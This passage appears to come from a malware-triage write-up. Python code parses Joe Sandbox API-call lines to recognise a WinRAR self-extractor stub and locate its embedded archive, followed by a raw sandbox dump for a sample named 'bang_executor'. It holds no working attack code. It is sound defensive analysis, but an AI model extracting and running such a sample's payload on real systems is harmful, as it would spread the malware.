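# Matches report lines such as
#   "• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 005003F3"
#   "• _wcslen.LIBCMT ref: 004F1445"
#   "• Part of subcall function 004FFFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004FFFFE"
# The greedy (.*) for args backtracks to the last ')' before ", ref:", so nested
# parentheses like 00000001(TokenIntegrityLevel) survive intact.
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w@?$]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str] = field(default_factory=list)
    ref: str = ""
    subcall: Optional[str] = None  # set for "Part of subcall function XXXXXXXX" lines


def _split_args(raw: str) -> List[str]:
    """Split on commas at parenthesis depth 0 only."""
    out, cur, depth = [], [], 0
    for ch in raw:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    if cur:
        out.append("".join(cur).strip())
    return out


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API-call line of a report excerpt; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append(ApiCall(api=m["api"], module=m["module"],
                                 args=_split_args(m["args"] or ""),
                                 ref=m["ref"].upper(), subcall=m["sub"]))
    return calls


# (API, argument string) pairs that the SFX stub listing above exhibits. Assumed
# indicator set for this example; extend it as needed.
SFX_INDICATORS = {
    "sfx_mapping":  ("OpenFileMappingW", "winrarsfxmappingfile.tmp"),
    "sfx_env_cmd":  ("SetEnvironmentVariableW", "sfxcmd"),
    "sfx_env_par":  ("SetEnvironmentVariableW", "sfxpar"),
    "sfx_env_name": ("SetEnvironmentVariableW", "sfxname"),
    "sfx_env_time": ("SetEnvironmentVariableW", "sfxstime"),
    "sfx_startdlg": ("DialogBoxParamW", "STARTDLG"),
}


def sfx_indicators(calls: List[ApiCall]) -> set:
    """Return the names of SFX indicators present in the parsed calls."""
    return {name for c in calls
            for name, (api, needle) in SFX_INDICATORS.items()
            if c.api == api and needle in c.args}


# Documented RAR archive signatures (the "Rar!" magic followed by version bytes).
RAR_SIGNATURES = {
    b"Rar!\x1a\x07\x00": "RAR4",
    b"Rar!\x1a\x07\x01\x00": "RAR5",
}


def find_embedded_rar(blob: bytes) -> Optional[Tuple[int, str]]:
    """Return (offset, version) of the earliest RAR signature in an SFX image, or None."""
    best = None
    for sig, ver in RAR_SIGNATURES.items():
        off = blob.find(sig)
        if off != -1 and (best is None or off < best[0]):
            best = (off, ver)
    return best


# Constructed excerpt in the report's line format (addresses copied from the listing above).
SAMPLE_REPORT = """\
• GetCommandLineW.KERNEL32 ref: 005003C9
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 005003F3
  • Part of subcall function 004FFFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004FFFFE
  • Part of subcall function 004FFFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00500038
• SetEnvironmentVariableW.KERNEL32(sfxname,00542CC0), ref: 00500482
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 005004F6
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00500565
  • Part of subcall function 004FD392: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 004FD3C2
"""

# Constructed stand-in for an SFX image: a fake MZ header, padding, then a RAR5 archive at 0x400.
SAMPLE_SFX = b"MZ" + b"\x00" * 0x3FE + b"Rar!\x1a\x07\x01\x00" + b"<archive body>"

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_REPORT)
    print(f"{len(calls)} API calls parsed; SFX indicators: {sorted(sfx_indicators(calls))}")
    print("embedded archive:", find_embedded_rar(SAMPLE_SFX))
```

On a real sample, pass the bytes of the executable to find_embedded_rar and write everything from the returned offset to a .rar file; unrar or 7-Zip can then list the archive and show its comment, which is where an SFX script's Setup= and Silent= directives sit. Six indicator hits, as in the excerpt, is strong evidence that the function listing belongs to the stub rather than to the malware author's code, so time is better spent on the extracted payload than on these native functions.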

                                        Control-flow Graph
                                        [Rendered graph; executed/not-executed node list omitted. Entry 004FC652: FindResourceW(PNG) -> SizeofResource -> LoadResource -> LockResource -> GlobalAlloc -> GlobalLock -> call 00504250 -> call 004FC5B6 -> GdipCreateHBITMAPFromBitmap -> GlobalUnlock -> GlobalFree; every failed step returns via 004FC76B.]
                                        APIs
                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,004FDA3D,00000066), ref: 004FC665
                                        • SizeofResource.KERNEL32(00000000,?,?,?,004FDA3D,00000066), ref: 004FC67C
                                        • LoadResource.KERNEL32(00000000,?,?,?,004FDA3D,00000066), ref: 004FC693
                                        • LockResource.KERNEL32(00000000,?,?,?,004FDA3D,00000066), ref: 004FC6A2
                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,004FDA3D,00000066), ref: 004FC6BD
                                        • GlobalLock.KERNEL32(00000000,?,?,?,?,?,004FDA3D,00000066), ref: 004FC6CE
                                        • GlobalUnlock.KERNEL32(00000000), ref: 004FC756
                                          • Part of subcall function 004FC5B6: GdipAlloc.GDIPLUS(00000010), ref: 004FC5BC
                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 004FC737
                                        • GlobalFree.KERNEL32(00000000), ref: 004FC75D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                        • String ID: FjuKP$PNG
                                        • API String ID: 541704414-1231597661
                                        • Opcode ID: 1c86261ad9dd651bb7103f238dfef9fcfdc57701d2f309370416452d5b8cff09
                                        • Instruction ID: 2795e08b7ad16125aed1d84c9af615f6af60e00e0e1713b519be295ce21f2066
                                        • Opcode Fuzzy Hash: 1c86261ad9dd651bb7103f238dfef9fcfdc57701d2f309370416452d5b8cff09
                                        • Instruction Fuzzy Hash: 9A31C17560070AABC310AF21DD88D6B7FE8EF957617044529FA0582261EB35D808EFA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,08ADEBCE), ref: 004EF9CD
                                          • Part of subcall function 004EE208: _wcslen.LIBCMT ref: 004EE210
                                          • Part of subcall function 004F2663: _wcslen.LIBCMT ref: 004F2669
                                          • Part of subcall function 004F3D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,08ADEBCE,?,?,08ADEBCE,00000001,004EDA04,00000000,08ADEBCE,?,0001045C,?,?), ref: 004F3D2C
                                        • _wcslen.LIBCMT ref: 004EFD00
                                        • __fprintf_l.LIBCMT ref: 004EFE50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
                                        • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL$|lQ
                                        • API String ID: 2646189078-3663991832
                                        • Opcode ID: 5dc5da334b55f0ee6cc37b7f6c9cf4dfcc227249c4a680db218caca809700946
                                        • Instruction ID: de26215642a1f838b73e79ad08bb8ecda6d419062265e052318471f3b78c4800
                                        • Opcode Fuzzy Hash: 5dc5da334b55f0ee6cc37b7f6c9cf4dfcc227249c4a680db218caca809700946
                                        • Instruction Fuzzy Hash: 38420471900299ABDF24EFA5CC41BFEB7B4FF44304F50052BEA05AB281EB795A45CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph
                                        [Rendered graph; executed/not-executed node list omitted. Entry 004EC4A8: call 00501590, then either FindFirstFileW (on failure: call 004EDA1E, retry FindFirstFileW, GetLastError) for the first iteration or FindNextFileW with GetLastError on failure for later ones, followed by the cleanup calls 004F268B, 004EE27E and 004F3724 (x3) before returning through 005010F9.]
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?,00000000), ref: 004EC4E6
                                          • Part of subcall function 004EDA1E: _wcslen.LIBCMT ref: 004EDA59
                                        • FindFirstFileW.KERNEL32(?,00000000,?,?,00000800,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?), ref: 004EC516
                                        • GetLastError.KERNEL32(?,?,00000800,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?,00000000,0000003A), ref: 004EC522
                                        • FindNextFileW.KERNEL32(?,?,00000000,?,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?,00000000), ref: 004EC549
                                        • GetLastError.KERNEL32(?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 004EC555
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                        • String ID:
                                        • API String ID: 42610566-0
                                        • Opcode ID: 9e8c841639f2145020170e7bc48626a3db618cd8fc632c553875bcf123d00762
                                        • Instruction ID: c2389d9cc50c1894ab3b64ee67c1459edd8f4ce8be5bdadd58a628cf2a8ba3ca
                                        • Opcode Fuzzy Hash: 9e8c841639f2145020170e7bc48626a3db618cd8fc632c553875bcf123d00762
                                        • Instruction Fuzzy Hash: 3E4183B1508285ABC324DF25D8C49EBF7E8BF88341F00491EF59AD3240D734A949CB96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph
                                        [Rendered graph; executed/not-executed node list omitted. Entry 004FCEBF: call 004FD392 (reads the caller's TokenIntegrityLevel SID) -> SetEntriesInAclW -> InitializeSecurityDescriptor -> SetSecurityDescriptorDacl -> CreateDirectoryW with that explicit DACL -> LocalFree; the directory is created with an ACL derived from the process integrity level rather than inheriting the parent's.]
                                        APIs
                                          • Part of subcall function 004FD392: GetCurrentProcess.KERNEL32(00020008,?), ref: 004FD3A1
                                          • Part of subcall function 004FD392: OpenProcessToken.ADVAPI32(00000000), ref: 004FD3A8
                                          • Part of subcall function 004FD392: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 004FD3C2
                                          • Part of subcall function 004FD392: GetLastError.KERNEL32 ref: 004FD3CC
                                          • Part of subcall function 004FD392: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 004FD3F0
                                          • Part of subcall function 004FD392: CopySid.ADVAPI32(00000044,?,00000000), ref: 004FD401
                                        • SetEntriesInAclW.ADVAPI32(00000001,?,00000000,?), ref: 004FCF20
                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 004FCF2F
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004FCF42
                                        • CreateDirectoryW.KERNELBASE(?,?), ref: 004FCF61
                                        • LocalFree.KERNEL32(?), ref: 004FCF6F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Token$DescriptorInformationProcessSecurity$CopyCreateCurrentDaclDirectoryEntriesErrorFreeInitializeLastLocalOpen
                                        • String ID:
                                        • API String ID: 2740647886-0
                                        • Opcode ID: 35c319afdc5e31c13a834ea8c5867f527cc63f1200d05d9305f4d8cdadd1daa2
                                        • Instruction ID: 15568502f063988834ecc1fd0c9ad5baf3a3552c7a52a737563050f6d53d0066
                                        • Opcode Fuzzy Hash: 35c319afdc5e31c13a834ea8c5867f527cc63f1200d05d9305f4d8cdadd1daa2
                                        • Instruction Fuzzy Hash: 6D2105B190020DABDB10CFA5D9889EFBBFCFF49304F00812AB915D2250E734DA19DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,0050A616,?,0051F7B0,0000000C,0050A76D,?,00000002,00000000), ref: 0050A661
                                        • TerminateProcess.KERNEL32(00000000,?,0050A616,?,0051F7B0,0000000C,0050A76D,?,00000002,00000000), ref: 0050A668
                                        • ExitProcess.KERNEL32 ref: 0050A67A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: b2f364b42da9ba77ebfb6ece3fbb25a49d81eefb148953cf1ad1c8af9652c9ba
                                        • Instruction ID: 7b10c5a9d4460e08ea3808fdccd3aa608f4c78dfd2896e3173b85c71c007479c
                                        • Opcode Fuzzy Hash: b2f364b42da9ba77ebfb6ece3fbb25a49d81eefb148953cf1ad1c8af9652c9ba
                                        • Instruction Fuzzy Hash: 23E0B635440208AFCF116F64DD0DA9C3F7AFB94781F048414F8098A172DB37ED46DA95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        • __tmp_reference_source_, xrefs: 004E9C0E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$AttributesFile_swprintf$CurrentH_prolog3Process__aulldiv_wcsrchr
                                        • String ID: __tmp_reference_source_
                                        • API String ID: 3636405837-685763994
                                        • Opcode ID: 9b507845192e53ac69e156e7d647fccdff1d53e26e454047c4fb0371b3c4dae6
                                        • Instruction ID: 835b14e844d7a5b8c2da4c829142cc3e0850a98a7bd2bd407a0599a3b37c14a9
                                        • Opcode Fuzzy Hash: 9b507845192e53ac69e156e7d647fccdff1d53e26e454047c4fb0371b3c4dae6
                                        • Instruction Fuzzy Hash: B6A248305042C5AEDF25DF62C884BEF7BA4BF05305F0841BBDD499B282D7386955C7AA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 827ea4e74991c9796b12337d907de68f736f20a140f496ae5053f4e782595e9e
                                        • Instruction ID: 84391659dc911df2bfaaed0a587b97b75c6836c9080d37f5fc2149f1f418ff9e
                                        • Opcode Fuzzy Hash: 827ea4e74991c9796b12337d907de68f736f20a140f496ae5053f4e782595e9e
                                        • Instruction Fuzzy Hash: 07D1B7716083498FDB14DF29C84476BBBE1BF85308F04456EEA899B342DB78ED05CB5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4f290a-4f2941 call 501590 GetModuleHandleW 3 4f2999-4f2bfa 0->3 4 4f2943-4f2953 GetProcAddress 0->4 5 4f2cda 3->5 6 4f2c00-4f2c0d call 509e7e 3->6 7 4f296d-4f297d GetProcAddress 4->7 8 4f2955-4f296b 4->8 10 4f2cdc-4f2d08 GetModuleFileNameW call 4ee208 call 4f268b 5->10 6->10 17 4f2c13-4f2c41 GetModuleFileNameW CreateFileW 6->17 7->3 9 4f297f-4f2994 7->9 8->7 9->3 24 4f2d0a-4f2d16 call 4ed076 10->24 19 4f2ccc-4f2cd8 CloseHandle 17->19 20 4f2c47-4f2c53 SetFilePointer 17->20 19->10 20->19 23 4f2c55-4f2c71 ReadFile 20->23 23->19 25 4f2c73-4f2c7f 23->25 34 4f2d18-4f2d23 call 4f28ab 24->34 35 4f2d45-4f2d6c call 4ee27e GetFileAttributesW 24->35 27 4f2ede-4f2ee3 call 5013f9 25->27 28 4f2c85-4f2ca4 25->28 31 4f2cc1-4f2cca call 4f23d6 28->31 31->19 40 4f2ca6-4f2cc0 call 4f28ab 31->40 34->35 42 4f2d25-4f2d35 34->42 43 4f2d6e-4f2d72 35->43 44 4f2d76 35->44 40->31 49 4f2d40-4f2d43 42->49 43->24 47 4f2d74 43->47 48 4f2d78-4f2d7d 44->48 47->48 50 4f2d7f 48->50 51 4f2db4-4f2db6 48->51 49->35 49->43 54 4f2d81-4f2da8 call 4ee27e GetFileAttributesW 50->54 52 4f2dbc-4f2dd3 call 4ee252 call 4ed076 51->52 53 4f2ec3-4f2edb call 5010f9 51->53 66 4f2e3b-4f2e6e call 4e4c00 AllocConsole 52->66 67 4f2dd5-4f2e36 call 4f28ab * 2 call 4f0597 call 4e4c00 call 4f0597 call 4fc774 52->67 62 4f2daa-4f2dae 54->62 63 4f2db2 54->63 62->54 64 4f2db0 62->64 63->51 64->51 72 4f2ebb-4f2ebd ExitProcess 66->72 73 4f2e70-4f2eb5 GetCurrentProcessId AttachConsole call 506433 GetStdHandle WriteConsoleW Sleep FreeConsole 66->73 67->72 73->72
                                        APIs
                                        • GetModuleHandleW.KERNEL32 ref: 004F2937
                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004F2949
                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004F2973
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004F2C1D
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F2C37
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004F2C4B
                                        • ReadFile.KERNEL32(00000000,?,00007FFE,$oQ,00000000), ref: 004F2C69
                                        • CloseHandle.KERNEL32(00000000), ref: 004F2CCD
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004F2CE6
                                        • CompareStringW.KERNEL32(00000400,00001001,poQ,?,DXGIDebug.dll,?,$oQ,?,00000000,?,00000800), ref: 004F2D3A
                                        • GetFileAttributesW.KERNELBASE(?,?,$oQ,00000800,?,00000000,?,00000800), ref: 004F2D64
                                        • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 004F2DA0
                                          • Part of subcall function 004F28AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004F28D4
                                          • Part of subcall function 004F28AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004F1309,Crypt32.dll,00000000,004F1383,00000200,?,004F1366,00000000,00000000,?), ref: 004F28F4
                                        • _swprintf.LIBCMT ref: 004F2E12
                                        • _swprintf.LIBCMT ref: 004F2E5E
                                        • AllocConsole.KERNEL32 ref: 004F2E66
                                        • GetCurrentProcessId.KERNEL32 ref: 004F2E70
                                        • AttachConsole.KERNEL32(00000000), ref: 004F2E77
                                        • _wcslen.LIBCMT ref: 004F2E8C
                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004F2E9D
                                        • WriteConsoleW.KERNEL32(00000000), ref: 004F2EA4
                                        • Sleep.KERNEL32(00002710), ref: 004F2EAF
                                        • FreeConsole.KERNEL32 ref: 004F2EB5
                                        • ExitProcess.KERNEL32 ref: 004F2EBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
                                        • String ID: $oQ$$rQ$$sQ$(pQ$(tQ$,qQ$4sQ$<$<oQ$<rQ$@pQ$DXGIDebug.dll$DqQ$DtQ$LsQ$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$XoQ$XpQ$\qQ$\tQ$`rQ$dsQ$dwmapi.dll$kernel32$poQ$ppQ$tqQ$uxtheme.dll$xrQ$xsQ$xtQ$oQ$pQ
                                        • API String ID: 270162209-3066497542
                                        • Opcode ID: 56be42ef1b0f47f2eacc54312db6d79cb66e4c63dda135be7d9620c19e95fdf8
                                        • Instruction ID: ed5bc105843a6a99b3283c951779427213b43be60b2300faca6fee923e0ac967
                                        • Opcode Fuzzy Hash: 56be42ef1b0f47f2eacc54312db6d79cb66e4c63dda135be7d9620c19e95fdf8
                                        • Instruction Fuzzy Hash: 62D180B1048388ABE730DF55D948BDFBFF8BB89308F10491DF69996250C7B48589CB66
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004E1366: GetDlgItem.USER32(00000000,00003021), ref: 004E13AA
                                          • Part of subcall function 004E1366: SetWindowTextW.USER32(00000000,005165F4), ref: 004E13C0
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004FDC06
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004FDC24
                                        • IsDialogMessageW.USER32(?,?), ref: 004FDC37
                                        • TranslateMessage.USER32(?), ref: 004FDC45
                                        • DispatchMessageW.USER32(?), ref: 004FDC4F
                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 004FDC72
                                        • EndDialog.USER32(?,00000001), ref: 004FDC95
                                        • GetDlgItem.USER32(?,00000068), ref: 004FDCB8
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004FDCD3
                                        • SendMessageW.USER32(00000000,000000C2,00000000,005165F4), ref: 004FDCE6
                                          • Part of subcall function 004FF77B: _wcslen.LIBCMT ref: 004FF7A5
                                        • SetFocus.USER32(00000000), ref: 004FDCED
                                        • _swprintf.LIBCMT ref: 004FDD4C
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 004FDDAF
                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 004FDDD7
                                        • GetTickCount.KERNEL32 ref: 004FDDF5
                                        • _swprintf.LIBCMT ref: 004FDE0D
